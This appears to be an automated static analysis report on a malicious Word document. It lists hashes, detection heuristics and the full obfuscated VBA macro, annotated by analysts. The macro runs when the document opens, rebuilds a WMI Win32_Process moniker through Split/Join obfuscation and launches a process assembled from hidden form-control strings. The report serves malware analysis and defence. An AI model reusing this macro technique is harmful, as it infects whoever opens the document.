Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7773da7405e3481d…

MALICIOUS

Office (OLE)

183.3 KB · Created: 2019-12-20 12:27:00 · Authoring application: Microsoft Office Word · First seen: 2020-05-14
MD5: d20ab523a18f055c737ab3ebdfb418e4 SHA-1: 7ca7549df388c3bc05362b2df6aad8d8c4e36678 SHA-256: 7773da7405e3481d19a4487a9a6a231039f8b5e5d924ebcc95b02a5b5bf5c355
Risk score: 172

Heuristics (7)

  • ClamAV: Doc.Downloader.Generic-7469790-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7469790-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call — the argument (Rpmdfmcv) is not a literal: it is assembled at runtime by a Split/Join pair in the extracted macro source below, and the literal pieces reassemble to a "winmgmts:" WMI moniker.
    Matched line in script
    Set Cnnxftaudijtf = GetObject(Rpmdfmcv)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace found in ordinary Office files, not a contacted host; do not treat it as a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7456 bytes
SHA-256: 510b9fb2df740ca55054380eece8ab243b2f32c2b7ef22a42e4ab34c92a53a2e
Detection
ClamAV: No threats found — the absence of a signature hit on the decoded source does not contradict the parent verdict; the artifact's assessment rests on the obfuscation check below and the GetObject / auto-exec findings above.
Obfuscation or payload: likely
190 of 302 identifiers look randomly generated (e.g. 'Pnrpeqoknclfz') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script. Note: the macro reads its string fragments from control properties of the UserForm module Ohxgbrilhx (default value, Tag, ControlTipText) and from the ThisDocument TextBox Deihnpxkvtdue; those values are stored in the form/document data, not in the VBA source, and are not shown here — they must be extracted separately to recover the WMI class name and the launched command line in full.
Attribute VB_Name = "Eehltfkxwg"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Deihnpxkvtdue, 0, 0, MSForms, TextBox"
' Module "Eehltfkxwg" is ThisDocument (VB_Base = 1Normal.ThisDocument).
' The MSForms TextBox Deihnpxkvtdue declared above is read by the other
' module as Eehltfkxwg.Deihnpxkvtdue; its content is stored with the
' document, not in this source dump, and is one of the fragments spliced
' into the WMI moniker and the command line (presumably a single "P" so
' that "winmgmts:Win32_" & value & "rocess" reads Win32_Process -- TODO
' confirm from the control data).
'
' Auto-exec entry point: fires when the document is opened (finding
' OLE_VBA_DOCOPEN). The only live statement is the bare call to
' Foxnzyhueflj; every other line is filler.
Private Sub Document_open()
   ' Filler: Syntoazphs is never assigned anywhere in this dump, so it is
   ' Empty, which compares as 0 -- the loop condition is false and the body
   ' never runs.
   Zzetriydl = 234 + 423
   Do While Syntoazphs = 1
      Anccvwtv = 3 * Dhhowgdrgs
      Txscrbspdml = ("Quibusdam soluta.")
      For Gpfdgruzh = Laesmqmvn To Eksfrcxhrwkj
         Xnzbvoldmrrx = ("Emmett")
         Napjsmkv = 223
      Next
      Zrczcjaq = Ocnurxib
Loop
' Real work: build the WMI objects and launch a process (see Foxnzyhueflj
' in module Dndcbirsevqkp). The return value is discarded.
Foxnzyhueflj
   ' Filler, same dead-loop pattern as above (Xhpqckvi is never assigned).
   Xcfiggdyau = 234 + 423
   Do While Xhpqckvi = 1
      Xwhrnsulm = 3 * Whjdossav
      Fcihmzzn = ("Henry")
      For Gseiaptkdohl = Zfnnrchk To Qejggvmyomqpe
         Dzqrwtuhhhg = ("Stella")
         Vhlvxirvgm = 223
      Next
      Bjwjkkbsz = Rtycwxbz
Loop
End Sub

Attribute VB_Name = "Ohxgbrilhx"
Attribute VB_Base = "0{1DDA49EA-E0D8-4BFA-BB2F-7D387BA46C00}{83E60713-1A19-44BE-A8C0-8D646D635586}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Module "Ohxgbrilhx" carries no code. Its VB_Base is a GUID pair rather
' than a document class, which is consistent with a UserForm module. The
' Dndcbirsevqkp module reads string fragments from its controls
' (Eifyggspoteqz, Uyvcnxvrjqu, Uvmyjiyvnrl, Qjhxhbtex by default property;
' Nosfhhwouzj.Tag; Uxkbnfsocpewg.ControlTipText; Qwhmkeushf.ControlTipText).
' Those property values live in the form's storage, not in the VBA source,
' so they are absent from this dump and must be extracted separately to
' recover the full command line.

Attribute VB_Name = "Dndcbirsevqkp"
' Builds the command-line string from form-control contents. Called only
' from Foxnzyhueflj, where the result is passed as the first argument of
' .Create on the WMI object. None of the fragments (the ThisDocument
' TextBox value and several Ohxgbrilhx control values) are present in this
' dump, so the actual command cannot be read from the source alone.
' Btwdsehbglq is never assigned (Empty), so the return value is effectively
' Iqfvaqfrc unchanged.
Function Xuuxbxyddksr()
   ' Filler: Sxalnqkyzwkkf is never assigned, so this loop body never runs.
   Xzkikmkkawzqg = 234 + 423
   Do While Sxalnqkyzwkkf = 1
      Bybmwtozzgtx = 3 * Djyqrtqria
      Allzbfsgvap = ("Nisi.")
      For Fexaeusuovn = Ozckqahjscnz To Fjocuealosq
         Msmpyohqt = ("Wendy")
         Komgnbkbzf = 223
      Next
      Attgtdkjum = Qgnolxymedrg
Loop
' Fragment 1: value of the TextBox on ThisDocument (not in this dump).
Irulcyqkihc = Eehltfkxwg.Deihnpxkvtdue
   ' Filler (Qjtcsrzdngxcz never assigned).
   Kiamvpznfhaxi = 234 + 423
   Do While Qjtcsrzdngxcz = 1
      Gwbeelshtsl = 3 * Hywxibwcb
      Ekemfynzm = ("Odit consequatur quia facilis.")
      For Eweakxca = Lsvpkztyf To Cwathgcue
         Pgtathqyabjx = ("Cameron")
         Iwvzubhgwcze = 223
      Next
      Rafgvscp = Gligkdszhb
Loop
' Fragments 2-4: default-property values of three UserForm controls.
Fbpmdeqbfmi = Irulcyqkihc + Ohxgbrilhx.Eifyggspoteqz + Ohxgbrilhx.Uyvcnxvrjqu + Ohxgbrilhx.Uvmyjiyvnrl
   ' Filler (Tzxyivsugpx never assigned).
   Uvmvbbxybkkv = 234 + 423
   Do While Tzxyivsugpx = 1
      Pmzeyhelrsota = 3 * Kcfmvbcicibl
      Pxxrchlb = ("Ea aut dolorum incidunt aliquam quis.")
      For Nzebgjeiqy = Jlpxndxw To Elcvqcywiiwty
         Acsdsuaqlnmce = ("Debitis et.")
         Ekprutzkt = 223
      Next
      Uqbgpmsbnb = Ebeuqieatdad
Loop
' Fragments 5-6: a fourth control value plus another control's Tag property.
Iqfvaqfrc = Fbpmdeqbfmi + Ohxgbrilhx.Qjhxhbtex + Ohxgbrilhx.Nosfhhwouzj.Tag
   ' Filler (Rdqzmzykzmdx never assigned).
   Zuvtyrngvv = 234 + 423
   Do While Rdqzmzykzmdx = 1
      Ebojswaptpyy = 3 * Gljxbcjlzxiz
      Lmqymemm = ("Error sed qui repellendus veritatis ea.")
      For Dytckbanmd = Dgvflsbrbsc To Gzaliitu
         Djgbywunqwxi = ("Sit enim.")
         Htukakkv = 223
      Next
      Dbacevjtgmswe = Uhfmegyp
Loop
' Return value. Btwdsehbglq is never assigned (Empty) and contributes
' nothing, so this is just Iqfvaqfrc.
Xuuxbxyddksr = Btwdsehbglq + Iqfvaqfrc + Btwdsehbglq
   ' Filler (Qjvndqwxkmznc never assigned).
   Vxftjzioj = 234 + 423
   Do While Qjvndqwxkmznc = 1
      Xcudfewp = 3 * Nfbcftuhfzj
      Rcqpuvvkc = ("Dolorum quasi qui.")
      For Cfugltutzv = Uvesffxgrj To Appbuagl
         Aayowmfpolbr = ("Porro.")
         Pcpffgrskrfw = 223
      Next
      Zzpercuetril = Vjbitvmr
Loop
End Function
' Main payload routine, called from Document_open. It (1) deobfuscates a
' "winmgmts:" WMI moniker by splitting a padded string on a junk separator
' and joining the pieces back, (2) binds to that class with GetObject,
' (3) binds a second WMI object whose name is only partly visible here and
' sets its XSize/YSize properties, and (4) calls .Create on the first
' object with the command line returned by Xuuxbxyddksr, looping until the
' call returns 0. The obfuscated string fragments that come from form
' controls are not in this dump. The repeating "X = 234 + 423 / Do While
' Y = 1 ... Loop" stanzas between the live statements are filler whose
' loop conditions are never true (the variables are never assigned).
Function Foxnzyhueflj()
   ' Filler (Mxqczuwld never assigned).
   Pnrpeqoknclfz = 234 + 423
   Do While Mxqczuwld = 1
      Hcgohlem = 3 * Usguagyunaiw
      Wbixbtcoga = ("Quas a error aut voluptatem sunt voluptatibus quia magnam ut.")
      For Ezuabmhpsf = Ynyqpivka To Gcglcqgmgkoc
         Nzvpmtrs = ("Ab.")
         Nvlzyeyljhoyu = 223
      Next
      Zmsdxjlzq = Avncaobhx
Loop
' Separator token that pads the moniker string below; the Split/Join pair
' strips it out again.
iwiwiiwiwjjsj = "__&888*&^bBGks^@"
   ' Filler (Exsvlpyg never assigned).
   Sxlfaxujllvgc = 234 + 423
   Do While Exsvlpyg = 1
      Ljjjyramz = 3 * Bfkuwgahg
      Migpynajuq = ("Enim.")
      For Pnlanuvucnsds = Ojxznuzw To Jsmlqvrj
         Glfnmltjypdw = ("Accusantium beatae unde quo vitae totam velit.")
         Mawrecprjy = 223
      Next
      Iilsaukn = Djmcaqxl
Loop
' Split the padded string on the separator. With the separator removed the
' literal pieces read "wi"+"nmg"+"mts"+":Wi"+"n3"+"2_" = "winmgmts:Win32_",
' then the TextBox value, then "ro"+"ce"+"ss" = "rocess" -- i.e. the WMI
' moniker for Win32_Process if the TextBox holds "P" (TODO confirm from the
' control data; the value is not in this dump).
Jbtqdshtfr = Split("__&888*&^bBGks^@wi__&888*&^bBGks^@nmg__&888*&^b" + "BGks^@mts__&888*&^bBGks^@:Wi__&888*&^bB" + "Gks^@n3__&888*&^bBGks^@2___&888*&^bBGks^@" + Eehltfkxwg.Deihnpxkvtdue + "__&888*&^bBGks^@ro__&888*&^bBGks^@ce__&888*&^bBGks^@ss__&888*&^bBGks^@", iwiwiiwiwjjsj)
   ' Filler (Jdmcckyp never assigned).
   Bdlfcbiqby = 234 + 423
   Do While Jdmcckyp = 1
      Eprfhwvdxguz = 3 * Rztbyaiveaclh
      Bkkcjywnwtmv = ("Non.")
      For Ogjjnldr = Jjikrdwprlw To Wlaulximel
         Tsctrojotsz = ("Totam tempore.")
         Wswxeleswn = 223
      Next
      Qrtnefynuy = Vzxmirdmkjpe
Loop
' Reassemble the pieces with no separator: Rpmdfmcv is the deobfuscated
' moniker string.
Rpmdfmcv = Join(Jbtqdshtfr, "")
   ' Filler (Ajpyjjivjedv never assigned).
   Fpvcdtytoj = 234 + 423
   Do While Ajpyjjivjedv = 1
      Hldzvswb = 3 * Dkodwlfmiezz
      Jmvqdblas = ("Quam.")
      For Mqpnzwzstv = Ezxyrmfchawp To Gxpkdsnrjuqyi
         Grkksqrfctnmz = ("Eveniet.")
         Taecpcdjsg = 223
      Next
      Pcitexcaime = Psnqpfnnx
Loop
' Bind to the WMI class through the moniker (finding OLE_VBA_GETOBJ).
' Cnnxftaudijtf is the object whose .Create method is invoked at the end.
Set Cnnxftaudijtf = GetObject(Rpmdfmcv)
   ' Filler (Rjlevqzdpsq never assigned).
   Nuwcvjdnxiyt = 234 + 423
   Do While Rjlevqzdpsq = 1
      Yfqfyzsdt = 3 * Tunqmsdgww
      Sjaqskedmzde = ("Saepe laborum aut a.")
      For Czuujysyk = Iqwpjzjz To Wyiztonztqiif
         Mbnbctyy = ("Quis et ut aut.")
         Tindaufyif = 223
      Next
      Vpjfzrkual = Wxvxhfxzup
Loop
' Second moniker: the same deobfuscated prefix plus two ControlTipText
' values from the UserForm and the TextBox value again. Those fragments are
' not visible here, so the exact class name cannot be stated from the
' source alone.
Lztgmlgkjuoql = Rpmdfmcv + Ohxgbrilhx.Uxkbnfsocpewg.ControlTipText + Ohxgbrilhx.Qwhmkeushf.ControlTipText
   ' Filler (Hnpqpquhmzlz never assigned).
   Rpqawzhnhswx = 234 + 423
   Do While Hnpqpquhmzlz = 1
      Fevqkblms = 3 * Plccgfvyml
      Korxkdrowbbhd = ("Sint est ducimus in ut molestias voluptates.")
      For Ntiuuoeze = Ftqbkujhl To Dajbmonjvzkz
         Eqbifomff = ("Suzanne")
         Yvrhywlduphlt = 223
      Next
      Luweuuhwgdh = Ngyvldosw
Loop
Chwivovuxgv = Lztgmlgkjuoql + Eehltfkxwg.Deihnpxkvtdue
   ' Filler (Iaxxoevcuabk never assigned).
   Qqqddtsvdqtj = 234 + 423
   Do While Iaxxoevcuabk = 1
      Bbcavsobcoj = 3 * Ddpdibkhetg
      Wovpctycubnto = ("Mollitia ex saepe deleniti aut porro quo dignissimos.")
      For Hyinhnrye = Jkjwivoxvzfm To Hpjcbkutdzg
         Ejfpqrikotxt = ("Cassandra")
         Qmgclvwzy = 223
      Next
      Dnypgjqwcjopj = Dgtvmjkfehxx
Loop
' Bind the second object and keep it in the function's own return variable;
' the property writes and the .Create argument below refer to it by the
' function name.
Set Foxnzyhueflj = GetObject(Chwivovuxgv)
   ' Filler (Mhfteymnvxlt never assigned).
   Ozxxswibrkz = 234 + 423
   Do While Mhfteymnvxlt = 1
      Tweybdspi = 3 * Wqqwtfkjfszig
      Idtblepro = ("Eum autem voluptatem iure et perferendis.")
      For Lxcbxyhuih = Bsbjxmuoyfv To Whmugybrhtn
         Vaamlymm = ("Shawna")
         Kvsfuqogb = 223
      Next
      Arvabjuyuy = Tqunmtxj
Loop
' XSize/YSize set to False (0). These property names match Win32_ProcessStartup,
' which would make the second object a startup-information instance for the
' .Create call below -- consistent with the visible string pieces but not
' provable without the form data; TODO confirm.
Foxnzyhueflj.XSize = False
   ' Filler (Uzlezkjtzww never assigned).
   Ytqwtpubcvfwq = 234 + 423
   Do While Uzlezkjtzww = 1
      Pnjlyjrmpsksd = 3 * Nwkipyqxnbqmo
      Zwvxmpltxhk = ("Omnis.")
      For Gblvulgdm = Xyqwkhwcl To Nxgcibcmaexl
         Pvsdtnmirz = ("Autem consectetur dicta repellat quae qui velit sit voluptatem.")
         Pjqkipfnooprc = 223
      Next
      Anaanakv = Zslffggo
Loop
Foxnzyhueflj.YSize = False
   ' Filler (Hvcbcjgqkvlo never assigned).
   Cksuoytboincn = 234 + 423
   Do While Hvcbcjgqkvlo = 1
      Ujpmtgbt = 3 * Oyvizgcui
      Xyprowuhycjra = ("Natus quo qui impedit.")
      For Yqthqoewndoyq = Rggcxkzufkhl To Ehvoahma
         Ksccnaxdc = ("Quo.")
         Dkywoyvoxi = 223
      Next
      Sivskpwgrg = Ehxgfmdimtaw
Loop
' Launch. Calls .Create on the first WMI object with the command line built
' by Xuuxbxyddksr and the second object as the third argument, and repeats
' while the call returns nonzero. For Win32_Process.Create (CommandLine,
' CurrentDirectory, ProcessStartupInformation, ProcessId) a return of 0
' means the process was created, so this loop retries until the launch
' succeeds. KSNNSN, Jowqyjhqxb and Esfksqplop are never assigned (Empty):
' KSNNSN adds nothing to the command line, Jowqyjhqxb leaves the working
' directory unset, and Esfksqplop would receive the new process ID.
Do While Cnnxftaudijtf.Create(KSNNSN & Xuuxbxyddksr, Jowqyjhqxb, Foxnzyhueflj, Esfksqplop)
Loop
   ' Filler (Vqntwmdgldm never assigned).
   Qmzelfszfnc = 234 + 423
   Do While Vqntwmdgldm = 1
      Sgvmdshbxu = 3 * Hfckmwkko
      Vcdxhjfj = ("Dignissimos rem.")
      For Anmdsjkcnyvd = Hbvygbzvqcz To Vasrlxmhsphum
         Bdhsqoqfn = ("Omnis saepe.")
         Lvewjdjk = 223
      Next
      Vgkfzhol = Tbrumvhs
Loop
End Function